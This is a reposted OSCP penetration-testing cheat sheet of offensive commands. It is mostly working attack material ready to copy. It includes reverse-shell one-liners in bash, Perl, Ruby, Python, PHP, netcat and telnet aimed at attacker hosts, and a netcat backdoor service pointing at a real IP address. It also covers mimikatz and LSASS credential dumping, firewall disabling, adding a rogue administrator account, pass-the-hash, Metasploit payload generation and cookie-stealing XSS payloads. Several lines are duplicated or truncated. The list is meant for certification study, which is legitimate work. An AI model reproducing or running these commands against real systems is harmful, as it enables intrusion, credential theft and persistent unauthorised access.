# Site Reference:   

https://sathisharthars.wordpress.com/2015/01/28/oscp-offensive-security-certified-professional-handy-tips-and-tricks/

OSCP Handy Commands by sathisharthars

Nmap Full Web Vulnerable Scan:

mkdir /usr/share/nmap/scripts/vulscan

cd /usr/share/nmap/scrripts/vulscan

wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz

nmap -sS -sV –script=vulscan/vulscan.nse target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target

nmap -sS -sV –script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target

nmap -PN -sS -sV –script=vulscan –script-args vulscancorrelation=1 -p80 target

nmap -sV –script=vuln target

nmap -PN -sS -sV –script=all –script-args vulscancorrelation=1 target

Dirb Directory Bruteforce:

dirb http://IP:PORT dirbuster-ng-master/wordlists/common.txt

Nikto Scanner:

nikto -C all -h http://IP

WordPress Scanner:

wpscan –url http://IP/ –enumerate p

Uniscan Scanning:

uniscan.pl -u target -qweds

HTTP Enumeration:

httprint -h http://www.example.com -s signatures.txt

SKIP Fish Scanner:

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Uniscan Scanning:

uniscan –u http://www.hubbardbrook.org –qweds

Here, -q – Enable Directory checks

-w – Enable File Checks

-e – Enable robots.txt and sitemap.xml check

-d – Enable Dynamic checks

-s – Enable Static checks

Skipfish Scanning:

m-time threads -LVY donot update after result

skipfish -m 5 -LVY -W /usr/share/skipfish/dictionaries/complete.wl -u http://IP

Nmap Ports Scan:

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)

2)fargement

3)data packed – like orginal one not scan packet

4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target

5) nmap –source-port 53 target

nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)

nmap -Pn -T2 -sV –randomize-hosts IP1,IP2

nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)

nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)

nmap -sA -PN -sN target

nmap -sS -sV -T5 -F -A -O target (version detection)

nmap -sU -v target (Udp)

nmap -sU -P0 (Udp)

nmap -sC 192.168.31.10-12 (all scan default)

Netcat Scanning:

nc -v -w 1 target -z 1-1000

for i in {10..12}; do nc -vv -n -w 1 192.168.34.$i 21-25 -z; done

US Scanning:

us -H -msf -Iv 192.168.31.20 -p 1-65535 && us -H -mU -Iv 192.168.31.20 -p 1-65535

Unicornscan Scanning:

unicornscan X.X.X.X:a -r10000 -v

Kernel Scanning:

xprobe2 -v -p tcp:80:open 192.168.6.66

Samba Enumeartion:

nmblookup -A target

smbclient //MOUNT/share -I target -N

rpcclient -U “” target

enum4linux target

SNMP ENumeration:

snmpget -v 1 -c public IP version

snmpwalk -v 1 -c public IP

snmpbulkwalk -v 2 -c public IP

Windows Useful commands:

net localgroup Users

net localgroup Administrators

search dir/s *.doc

system(“start cmd.exe /k $cmd”)

sc create microsoft_update binpath=”cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe” start= auto error= ignore

/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

Procdump.exe -accepteula -ma lsass.exe lsass.dmp

mimikatz.exe “sekurlsa::minidump lsass.dmp” “log” “sekurlsa::logonpasswords”

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits

C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

Plink Tunnel:

plink.exe -P 22 -l root -pw “1234” -R 445:127.0.0.1:445 X.X.X.X

Enable RDP Access:

reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service remoteadmin enable

netsh firewall set service remotedesktop enable

Turn Off Firewall:

netsh firewall set opmode disable

Meterpreter:

run getgui -u admin -p 1234

run vnc -p 5043

Add User Windows:

net user test 1234 /add

net localgroup administrators test /add

Mimikatz:

privilege::debug

sekurlsa::logonPasswords full

Passing the Hash:

pth-winexe -U hash //IP cmd

Password Cracking using Hashcat:

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat commands:

c:> nc -l -p 31337

#nc 192.168.0.10 31337

c:> nc -v -w 30 -p 31337 -l < secret.txt

#nc -v -w 2 192.168.0.10 31337 > secret.txt

Banner Grabbing:

nc 192.168.0.10 80

GET / HTTP/1.1

Host: 192.168.0.10

User-Agent: SPOOFED-BROWSER

Referrer: K0NSP1RACY.COM

<enter>

<enter>

window reverse shell:

c:>nc -Lp 31337 -vv -e cmd.exe

nc 192.168.0.10 31337

c:>nc rogue.k0nsp1racy.com 80 -e cmd.exe

nc -lp 80

#nc -lp 31337 -e /bin/bash

nc 192.168.0.11 31337

nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000

Find all SUID root files:

find / -user root -perm -4000 -print

Find all SGID root files:

find / -group root -perm -2000 -print

Find all SUID and SGID files owned by anyone:

find / -perm -4000 -o -perm -2000 -print

Find all files that are not owned by any user:

find / -nouser -print

Find all files that are not owned by any group:

find / -nogroup -print

Find all symlinks and what they point to:

find / -type l -ls

Python:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

python -m SimpleHTTPServer (Starting HTTP Server)

PID:

fuser -nv tcp 80 (list PID of process)

fuser -k -n tcp 80 (Kill Process of PID)

Hydra:

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp (Self Explanatory)

Mount Remote Windows Share:

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling Exploit in Kali:

gcc -m32 -o output32 hello.c (32 bit)

gcc -o output hello.c (64 bit)

Compiling Windows Exploits on Kali:

cd /root/.wine/drive_c/MinGW/bin

wine gcc -o ability.exe /tmp/exploit.c -lwsock32

wine ability.exe

NASM Command:

nasm -f bin -o payload.bin payload.asm

nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting:

ssh -D 127.0.0.1:1080 -p 22 user@IP

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains commands target

Pivoting to One Network to Another:

ssh -D 127.0.0.1:1080 -p 22 user1@IP1

Add socks4 127.0.0.1 1080 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2

Add socks4 127.0.0.1 1081 in /etc/proxychains.conf

proxychains commands target

Pivoting Using metasploit:

route add 10.1.1.0 255.255.255.0 1

route add 10.2.2.0 255.255.255.0 1

use auxiliary/server/socks4a

run

proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

Exploit-DB search using CSV File:

searchsploit-rb –update

searchsploit-rb -t webapps -s WEBAPP

searchsploit-rb –search=”Linux Kernel”

searchsploit-rb -a “author name” -s “exploit name”

searchsploit-rb -t remote -s “exploit name”

searchsploit-rb -p linux -t local -s “exploit name”

For Privilege Escalation Exploit search:

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep “<|<=” | sort -k3

Metasploit Payloads:

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 X > system.exe

msfpayload php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R > exploit.php

msfpayload windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=443 R | msfencode -t asp -o file.asp

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c

Create a Linux Reverse Meterpreter Binary

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell

Create Reverse Shell (Shellcode)

msfpayload windows/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -b “\x00\x0a\x0d”

Create a Reverse Shell Python Script

msfpayload cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.py

Create a Reverse ASP Shell

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t asp -o shell.asp

Create a Reverse Bash Shell

msfpayload cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.sh

Create a Reverse PHP Shell

msfpayload php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R > shell.php

Edit shell.php in a text editor to add <?php at the beginning.

Create a Windows Reverse Meterpreter Binary

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X >shell.exe

Security Commands In Linux:

find programs with a set uid bit

# find / -uid 0 -perm -4000

find things that are world writable

# find / -perm -o=w

find names with dots and spaces, there shouldn’t be any

# find / -name ” ” -print

# find / -name “..” -print

# find / -name “. ” -print

# find / -name ” ” -print

find files that are not owned by anyone

# find / -nouser

look for files that are unlinked

# lsof +L1

get information about procceses with open ports

# lsof -i

look for weird things in arp

# arp -a

look at all accounts including AD

# getent passwd

look at all groups and membership including AD

# getent group

list crontabs for all users including AD

# for user in $(getent passwd|cut -f1 -d:); do echo “### Crontabs for $user ####”; crontab -u $user -l; done

#generate random passwords

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=’|fold -w 12| head -n 4

# find all immutable files, there should not be any

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

# fix immutable files

chattr -i file

Windows Buffer Overflow Exploitation Commands:

msfpayload windows/shell_bind_tcp R | msfencode -a x86 -b “\x00″ -t c

msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 R | msfencode -e x86/shikata_ga_nai -b “\x00″ -t c

COMMONLY USED BAD CHARACTERS:

\x00\x0a\x0d\x20                                            For http request

\x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c           Ending with (0\n\r_)

Useful Commands:

pattern create

pattern offset (EIP Address)

pattern offset (ESP Address)

add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000

!pvefindaddr suggest

!pvefindaddr modules

!pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona\%p

!mona config -get workingfolder

!mona mod

!mona bytearray -b “\x00\x0a”

!mona pc 5000

!mona po EIP

!mona suggest

SEH:

!mona suggest

!mona nosafeseh

nseh=”\xeb\x06\x90\x90″ (next seh chain)

iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)

ROP (DEP):

!mona modules

!mona ropfunc -m *.dll -cpb “\x00\x09\x0a’

!mona rop -m *.dll -cpb “\x00\x09\x0a’ (auto suggest)

ASLR:

!mona noaslr

EGG Hunter:

!mona jmp -r esp

!mona egg -t lxxl

\xeb\xc4 (jump backward -60)

buff=lxxllxxl+shell

!mona egg -t ‘w00t’

GDB Debugger Commands:

Setting Breakpoint :

break *_start

Execute Next Instruction :

next

step

n

s

Continue Execution :

continue

c

Data :

checking ‘REGISTERS’ and ‘MEMORY’

Display Register Values : (Decimal , Binary , Hex )

print /d –> Decimal

print /t –> Binary

print /x –> Hex

O/P :

(gdb) print /d $eax

$17 = 13

(gdb) print /t $eax

$18 = 1101

(gdb) print /x $eax

$19 = 0xd

(gdb)

Display values of specific memory locations :

command : x/nyz (Examine)

n –> Number of fields to display ==>

y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal)

z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

Cheat Codes:

Reverse Shellcode:

BASH:

bash -i >& /dev/tcp/192.168.23.10/443 0>&1

exec /bin/bash 0&0 2>&0

exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done

exec 5<>/dev/tcp/attackerip/4444

cat <&5 | while read line; do $line 2>&5 >&5; done # or:

while read line 0<&5; do $line 2>&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1

/bin/bash -i > /dev/tcp/192.168.23.10/443 0<&1 2>&1

PERL:

Shorter Perl reverse shell that does not depend on /bin/sh:

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

If the target system is running Windows use the following one-liner:

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,”attackerip:4444″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

RUBY:

Longer Ruby reverse shell that does not depend on /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

If the target system is running Windows use the following one-liner:

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e ‘c=TCPSocket.new(“attackerip”,”4444″);while(cmd=c.gets);IO.popen(cmd,”r”){|io|c.print io.read}end’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

ruby -rsocket -e’f=TCPSocket.open(“attackerip”,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

PYTHON:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP:

This code assumes that the TCP connection uses file descriptor 3.

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

If you would like a PHP reverse shell to download, try this link on pentestmonkey.net -> LINK

NETCAT:

Other possible Netcat reverse shells, depending on the Netcat version and compilation flags:

nc -e /bin/sh attackerip 4444

nc -e /bin/sh 192.168.37.10 443

If the -e option is disabled, try this

mknod backpipe p && nc 192.168.23.10 443 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe

/bin/sh | nc attackerip 4444

/bin/sh | nc 192.168.23.10 443

rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/

rm -f /tmp/p; mknod /tmp/p p && nc 192.168.23.10 444 0/tmp/

If you have the wrong version of netcat installed, try

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.23.10 >/tmp/f

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

TELNET:

If netcat is not available or /dev/tcp

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

mknod backpipe p && telnet attackerip 8080 0<backpipe | /bin/bash 1>backpipe

XTERM:

Xterm is the best..

To catch incoming xterm, start an open X Server on your system (:1 – which listens on TCP port 6001). One way to do this is with Xnest: It is available on Ubuntu.

Xnest :1 # Note: The command starts with uppercase X

Xnest :1 # Note: The command starts with uppercase X

Then remember to authorise on your system the target IP to connect to you:

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

xterm -display 127.0.0.1:1 # Run this OUTSIDE the Xnest, another tab

xhost +targetip # Run this INSIDE the spawned xterm on the open X Server

If you want anyone to connect to this spawned xterm try:

xhost + # Run this INSIDE the spawned xterm on the open X Server

xhost + # Run this INSIDE the spawned xterm on the open X Server

Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:

xterm -display attackerip:1

xterm -display attackerip:1

Or:

$ DISPLAY=attackerip:0 xterm

$ DISPLAY=attackerip:0 xterm

It will try to connect back to you, attackerip, on TCP port 6001.

Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:

/usr/openwin/bin/xterm -display attackerip:1

/usr/openwin/bin/xterm -display attackerip:1

PHP:

php -r ‘$sock=fsockopen(“192.168.0.100″,4444);exec(“/bin/sh -i <&3 >&3 2>&3″);’

JAVA:

r = Runtime.getRuntime()

p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])

p.waitFor()

XSS Cheat Codes:

(“< iframes >  src=http://IP:PORT </ iframes >”)

<script>document.location=http://IP:PORT</script>

‘;alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

”;!–“<XSS>=&amp;amp;{()}

<IMG SRC=”javascript:alert(‘XSS’);”>

<IMG SRC=javascript:alert(‘XSS’)>

<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>

<IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;>

<IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>

<IMG SRC=”jav ascript:alert(‘XSS’);”>

perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out

<BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

( “>< iframes http://google.de < iframes >)

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

“><script >alert(document.cookie)</script>

%253cscript%253ealert(document.cookie)%253c/script%253e

“><s”%2b”cript>alert(document.cookie)</script>

%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E

<img src=asdf onerror=alert(document.cookie)>

Useful Links To Read and Learn:

Enumeration:

http://www.0daysecurity.com/penetration-testing/enumeration.html

Windows Shellcode:

http://farlight.org/index.html?type=shellcode

http://shell-storm.org/shellcode/

http://www.windowsexploits.com/

XSS Cheat Codes:

http://www.xenuser.org/xss-cheat-sheet/

https://gist.github.com/sseffa/11031135

https://html5sec.org/

Reverse Shell Cheat Codes:

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://roo7break.co.uk/?p=215

Webshells:

http://www.r57shell.net/

Nikto Tutorial:

http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/

Exploit-db:

wget http://exploit-db.com/archive.tar.bz2

SNMP Enumeration:

http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09

http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html

SAMBA Enumeration:

http://www.iodigitalsec.com/windows-null-session-enumeration/

http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions

http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html

http://www.madirish.net/59

Passhing The Hash:

https://www.kali.org/penetration-testing/passing-hash-remote-desktop/

https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/

Hashcat Tutorial:

http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/

Wordlist Download:

https://wiki.skullsecurity.org/Passwords

http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html

NASM Tutorial:

http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm

Buffer overflow Tutorial:

I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploit from basic to intermediate level with step by step debugging.

Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html

SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html

Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html

Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html

Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html

ADVANCED:

Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).

Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/

Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/

Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/

Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/

Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/

Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

SQL Injection Cheat Codes:

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://resources.infosecinstitute.com/backdoor-sql-injection/

RFI/LFI Tutorials:

https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/

http://www.hackersonlineclub.com/lfi-rfi

https://0xzoidberg.wordpress.com/category/security/lfi-rfi/

NMAP Vulsan:

http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz

Online Hash Cracking:

http://www.objectif-securite.ch/

Dump Windows Password Hashes:

http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html

Windows Previlige Escalation:

http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html

http://www.fuzzysecurity.com/tutorials/16.html

Linux Previlige Escalation:

http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://www.rebootuser.com/?p=1758

Tunneling & Port Forwarding:

http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)

http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html

http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html

http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html

http://www.offensive-security.com/metasploit-unleashed/Portfwd

http://www.offensive-security.com/metasploit-unleashed/Pivoting

http://www.howtoforge.com/reverse-ssh-tunneling

http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)

http://www.offensive-security.com/metasploit-unleashed/Msfvenom

Useful Links:

http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials

https://www.corelan.be/index.php/articles/ – Exploit tutorials

http://www.securitytube.net/ – Training videos

http://www.offensive-security.com/blog/ – Offensive Security blog

http://blog.g0tmi1k.com/ – Security blog

http://carnal0wnage.attackresearch.com

http://cybershakti.my3gb.com/

http://www.offensive-security.com/metasploit-unleashed/Introduction

http://www.securityfocus.com/

http://www.exploit-db.com/

http://nmap.org/nsedoc/

http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/

http://www.fuzzysecurity.com/tutorials/16.html

http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html

http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf

http://pentestmonkey.net/tools/audit/unix-privesc-check

http://pentestmonkey.net/tools/windows-privesc-check

Videos:

http://www.securitytube.net/

http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)

http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)

Privilege Escalation in Windows:

http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore

http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates

http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions

Buffer Overflow Tutorial:

http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156

http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html

http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148

https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetration Testing)

https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)

https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )

https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)

https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)

http://www.securitytube.net/video/7640 (Simple buffer overflow)

https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)

http://www.securitytube.net/video/7735 (Avoiding bad characters)

PDF:

https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)

https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Exploitation Command)

http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitation Command List)

http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)

http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation)

Best Book I refer:

http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641

Windows compiled Exploit Reference:

